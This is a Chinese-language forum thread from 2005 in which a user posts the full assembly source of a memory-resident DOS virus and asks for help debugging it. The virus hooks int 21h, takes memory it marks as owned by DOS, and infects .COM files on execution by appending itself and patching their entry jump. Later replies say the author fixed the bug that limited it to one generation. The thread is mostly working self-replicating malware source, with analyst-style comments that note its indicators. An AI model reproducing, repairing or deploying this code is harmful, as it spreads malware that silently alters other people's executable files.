帮忙看一下,实在想不出为什么会出问题

Allen 2005-03-04 11:02:21
实在看不出在It_not_Install_Check之后,为什么连 mov ah, 2 都会错误,完整程序如下

; a infected file with my virii ;-)
; This is a resident virus which intercept the Int 21h,
; and when a COM is executed, the COM file will be infected.
; 20050303 by daineng@nj.cpsecure

; One segment holds everything; the assembler is told that both CS and DS
; refer to VirusSeg.
VirusSeg segment byte public
assume cs:VirusSeg, ds:VirusSeg

; Byte length of the span between Superadd_Start and Superadd_End, i.e. the
; part the author's comments describe as appended to a target file.
SAddSize equ offset Superadd_End - offset Superadd_Start
; Offset of Resident_End. Not referenced again in the listing shown here.
ResdSize equ offset Resident_End

; Assembled for offset 100h, where DOS loads a .COM image after the PSP.
org 100h


; Entry procedure. The listing represents an already-modified host program:
; its first three bytes are the jump below, and the displaced original bytes
; (B4 4C CD) are kept in first3bytes in the data area.
Resident_Virii proc far

Parasite_Start:
; The host's first 3 bytes were replaced with
; the following 3 bytes
db 0e9h ; jmp near to Para_Instrument
; rel16 displacement of 4: skips the remaining host byte (1), virid (2) and
; sjmp (1) that sit between this instruction and Para_Instrument.
dw 4

; Original host program was B4 4C CD 21 (mov ah,4Ch / int 21h = terminate);
; only its fourth byte is still emitted here.
;dw 4cb4h ; it's original program
;db 0cdh
db 21h
;..........................
;..........................
;..........................
;..........................
;..........................
;..........................

Resident_Start:
Superadd_Start: ; The part which will be superadd to a victim
; Two-byte marker (64h 6Eh). The handler further down reads two bytes at the
; jump target of an opened file and compares them with 6E64h, so this value
; is also a usable static indicator for analysts.
virid db 64h, 6eh
; Opcode byte of a near jmp (E9h); written as data, not executed in place.
sjmp db 0e9h

Para_Instrument:
; call/pop pair: the call pushes the run-time address of Calc_DeltaOFF.
call Calc_DeltaOFF

Calc_DeltaOFF: ; Calculate the delta offset
; BP = run-time address minus assembled address. All data references in the
; non-resident part add BP to an assembled offset.
pop bp
sub bp, offset Calc_DeltaOFF

; Copy the 3 saved host bytes from first3bytes to first3byte3 (DS:SI -> ES:DI).
; NOTE(review): relies on DS = ES and the direction flag being clear, as is
; usual at .COM entry - not established by this code itself.
lea si, [bp+offset first3bytes]
lea di, [bp+offset first3byte3]
movsw
movsb

; Residency probe: issue int 21h with AX = FBCCh and look for FBCCh coming
; back in BX. The resident handler (Resident_Code_Bgn) answers this call with
; xchg ax,bx; an unhooked DOS is expected not to return that value in BX.
; Analyst note: the fixed AX=FBCCh request is a behavioural indicator.
Installation_Check:
mov ax, 0fbcch
int 21h
cmp bx, 0fbcch ; Installation Check
jnz Install_Virii ; If not, then install it

; Already resident: skip installation and hand control back to the host.
jmp Restore_This_Victim

; Installation path: records the current int 21h vector, carves a memory
; block out of the program's allocation, copies the image there and points
; the int 21h vector at Resident_Code_Bgn in the new block.
; Analyst note: the visible end state is an int 21h vector that points into a
; block whose MCB owner word was rewritten to 8; an interrupt-vector or
; MCB-chain audit would show both.
Install_Virii:
; Save the Old Interrupt 21h
push ds
xor ax, ax
mov ds, ax
; Reads the far pointer stored at 0000:0084h (vector 21h): BX = offset,
; DS = segment.
lds bx, ds:[21h*4]
mov word ptr cs:[bp+old_int21], bx
mov word ptr cs:[bp+old_int21+2], ds
pop ds

; Obtain the Max Memory have been allocated
; AH=4Ah (resize block) with an impossible size is used as a query: the call
; is expected to fail and report the largest possible size in BX.
mov ah, 4ah
mov bx, 0ffffh ; Assume ES initially equals the segment of the PSP
int 21h ; BX = MCB size (total available paragraphs to program)

; Allocate the high memory
; Second AH=4Ah call shrinks the program's own block by the image size in
; paragraphs plus one.
mov ah, 4ah
;sub bx, (Resident_End-Resident_Start+15)/16+1
sub bx, (Resident_End-Parasite_Start+15+100h)/16+1
int 21h

mov ah, 48h ; Allocate memory
;mov bx, (Resident_End-Resident_Start+15)/16
mov bx, (Resident_End-Parasite_Start+15+100h)/16
int 21h
; NOTE(review): the carry flag is not tested after any of the three calls
; above; AX is used as a segment regardless of the outcome.
mov es, ax ; ES = High Memory Segment

push ds
; The paragraph just below the allocated segment is its memory control block.
dec ax
mov ds, ax
mov byte ptr ds:[0], 'Z' ; probably not needed
mov word ptr ds:[1], 8 ; Mark DOS as owner of MCB
pop ds

; Copy the virus to high memory
; The copy runs from offset 0 of DS to offset 0 of ES and its length includes
; an extra 100h bytes - presumably so that offsets assembled under org 100h
; stay valid in the new segment.
;lea si, [bp+offset Resident_Start]
xor si, si
xor di, di
;mov cx, (Resident_End-Resident_Start)/2
mov cx, (Resident_End-Parasite_Start+100h)/2
rep movsw ; DS:SI --> ES:DI

; Swap Interrupt Vectors
; Interrupts are disabled while the two halves of the vector are rewritten.
cli
push ds
xor ax, ax
mov ds, ax
;mov word ptr ds:[21h*4], Resident_Code_Bgn - Resident_Start
mov word ptr ds:[21h*4], offset Resident_Code_Bgn
mov ds:[21h*4+2], es
pop ds
sti
Install_Completed:

; Puts the host's original first three bytes back at offset 100h in memory
; and transfers control there, so the host runs as if unmodified.
Restore_This_Victim:
; BX -> working copy of the saved bytes (filled at start-up by movsw/movsb).
lea bx, [bp+offset first3byte3]
mov di, 100h
; Copy word + byte = 3 bytes to the start of the in-memory image.
mov ax, word ptr [bx]
mov word ptr [di], ax
mov ah, byte ptr [bx+2]
mov byte ptr [di+2], ah

; Goto this victim original start
; NOTE(review): registers other than BP are not reset before the jump.
mov bp, 100h
jmp bp


; Replacement int 21h handler. Answers the AX = FBCCh residency probe and
; passes every other request on to the saved original vector.
Resident_Code_Bgn: ; The intercepted int 21h will start here
; Check if Installation Check be called
cmp ax, 0fbcch
jnz It_not_Install_Check
It_Is_Install_Check:
; Reply to the probe: the caller's AX (FBCCh) ends up in BX.
xchg ax, bx
iret
It_not_Install_Check:

; Check if the EXEC be called
; The push/pop pair brackets a disabled debugging call (AH=2, print 'd').
push ax
push dx
;mov ah, 2
;mov dl, 'd'
;pushf
;call dword ptr old_int21
pop dx
pop ax
; As posted, the AH=4Bh (EXEC) dispatch is commented out, so Intercept_Start
; is not reached from here and every request is chained unchanged.
;cmp ah, 4bh
;jz Intercept_Start
; Far jump through the saved vector; the original handler's iret returns to
; the interrupted caller.
jmp dword ptr old_int21

; EXEC interception path. On entry DS:DX is the ASCIZ program name of the
; request. Looks at the name's extension, opens the file, and reads its start
; to decide whether it already carries the 64h 6Eh marker.
; Analyst note: an executed program file being opened read/write from inside
; the int 21h chain is the observable behaviour of this path.
Intercept_Start:
; Preserve every register the routine touches; restored at Infect_Over.
push ax
push bx
push cx
push dx
push si
push di
push ds
push es

; Check if it is a COM file
; Scan at most 13 bytes of the name for the terminating NUL, then step DI
; back 3 bytes from where the scan stopped.
mov ax, ds
mov es, ax
mov di, dx
mov al, 0
mov cx, 13
repne scasb
sub di, 3

; Word at ES:[DI] must equal the constant 'OC' and the byte at ES:[DI+2]
; must equal 'M'; otherwise the request is passed on untouched.
cmp word ptr es:[di], 'OC'
jnz Infect_Over
cmp byte ptr es:[di+2], 'M'
jnz Infect_Over

; Open the executing file
; pushf + far call reproduces the stack frame of an int instruction, so the
; original handler can be invoked without re-entering this one.
mov ax, 3d02h ; Open file for read/write access
pushf ; DS:DX -> ASCIZ program name
call dword ptr old_int21
jc Infect_Over
mov bx, ax ; BX = File Handle

; From here on DS = CS so the data area below can be addressed.
mov ax, cs
mov ds, ax

; Check if the file have been infected by me
; AH=3Fh: read the first 3 bytes of the file into first3bytes.
mov ah, 3fh
lea dx, first3bytes
mov cx, 3
pushf
call dword ptr old_int21

; A file that does not start with a near jmp (E9h) is treated as unmarked.
cmp byte ptr [first3bytes], 0e9h
jne Infect_It

; Detect Virus ID
; AX=4200h: seek from file start to CX:DX = 0:(word following the E9h).
xor cx, cx
mov dx, word ptr [first3bytes+1]
mov ax, 4200h
pushf
call dword ptr old_int21

; Read 2 bytes at that position into viriiiiiiid.
lea dx, viriiiiiiid
mov cx, 2
mov ah, 3fh
pushf
call dword ptr old_int21

; 6E64h is the virid marker (64h 6Eh) read as a little-endian word.
cmp word ptr viriiiiiiid, 6e64h
jne Infect_It

; Marker present (or Infect_It finished): close the handle in BX.
Close_The_File:
mov ah, 3eh
pushf
call dword ptr old_int21
; Restore the caller's registers in reverse push order and continue with the
; original int 21h handler for the request that was intercepted.
Infect_Over:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax

jmp dword ptr old_int21

; File-modification path, entered with BX = open file handle and DS = CS.
; Sequence visible below: seek to end, append SAddSize bytes starting at
; Superadd_Start, seek to start, overwrite the first 3 bytes with E9h plus
; the previously measured file size, then close.
; Analyst note: a modified file therefore starts with E9h and has the bytes
; 64h 6Eh at the start of the data appended to its original end.
Infect_It: ; Infect the new victim
; AX=4202h with CX:DX = 0: seek to end of file; DX:AX returns the file size.
xor dx, dx
xor cx, cx
mov ax, 4202h
pushf
call dword ptr old_int21

; Leave the file alone when the size does not fit in 16 bits or when the
; high byte of the low size word is FDh or more.
cmp dx, 0
jne Close_The_File
cmp ah, 0fdh
jae Close_The_File

mov word ptr viriiiiiiid, ax ; Save the victim original size

; AH=40h: write SAddSize bytes from Superadd_Start at the current (end)
; position.
mov ah, 40h
lea dx, Superadd_Start
mov cx, SAddSize
pushf
call dword ptr old_int21
jc Close_The_File

; Seek back to the start of the file.
mov ax, 4200h
xor cx, cx
xor dx, dx
pushf
call dword ptr old_int21

; Write 1 byte from sjmp (E9h) ...
mov ah, 40h
lea dx, sjmp
mov cx, 1
pushf
call dword ptr old_int21
; ... followed by the 2-byte size saved in viriiiiiiid.
; NOTE(review): neither of these two writes checks the carry flag.
mov ah, 40h
lea dx, viriiiiiiid
mov cx, 2
pushf
call dword ptr old_int21

jmp Close_The_File

; Data area. It lies before Superadd_End, so it is part of the SAddSize span.
; Saved far pointer (offset, segment) of the original int 21h handler.
old_int21 dd ?
; First 3 bytes of the host program as stored in this image; also reused by
; the handler as the buffer for the first 3 bytes read from an opened file.
first3bytes db 0b4h, 4ch, 0cdh
; Working copy filled at start-up and used by Restore_This_Victim.
first3byte3 db 0, 0, 0
; 2-byte scratch: holds the marker read from a file, later the file size.
viriiiiiiid db 0, 0
; Not referenced by any instruction in the listing shown here.
strMsg db "hello, baby!", 0ah, 0dh, '$', 0

; End markers used by the size expressions (SAddSize, ResdSize, copy length).
Resident_Code_End:
Superadd_End:
Resident_End:

Resident_Virii endp
VirusSeg ends


; Program entry point is the start of the Resident_Virii procedure.
end Resident_Virii

Allen 2005-03-07
这个问题我也不清楚,实际上我对调试的原理不大清楚的
VxD1 2005-03-07
我也有帖结不了
请教trw2000中的load装入调试和普通的调试有什么区别?
VxD1 2005-03-07
我来接分
Allen 2005-03-07
这个程序写错了,只能感染一次文件,被感染的文件没有感染能力,不过现在已经改过来了。鉴于是病毒,程序就不再贴了
Allen 2005-03-07
自己找出答案了,如果不assume ds或者assume ds:nothing就可以了,分给不了自己,谁进来接?
Allen 2005-03-04
错误是执行时遇到无效指令
(注:编译出来是可被Norton发现是病毒,虽然无害,只是复制自己,并不破坏,但还请妥善处理)
